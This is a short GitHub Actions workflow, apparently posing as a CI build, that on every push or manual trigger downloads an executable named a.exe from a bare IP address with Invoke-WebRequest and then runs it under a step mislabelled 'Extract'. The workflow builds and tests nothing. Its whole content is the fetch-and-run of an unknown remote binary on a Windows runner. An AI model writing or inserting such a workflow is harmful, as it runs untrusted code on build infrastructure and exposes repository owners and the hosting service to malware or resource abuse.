name: Cl

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest

    steps:
    - name: Download
      run: Invoke-WebRequest 155.4.68.79/a.exe -OutFile a.exe
    - name: Extract
      run:  ./a.exe

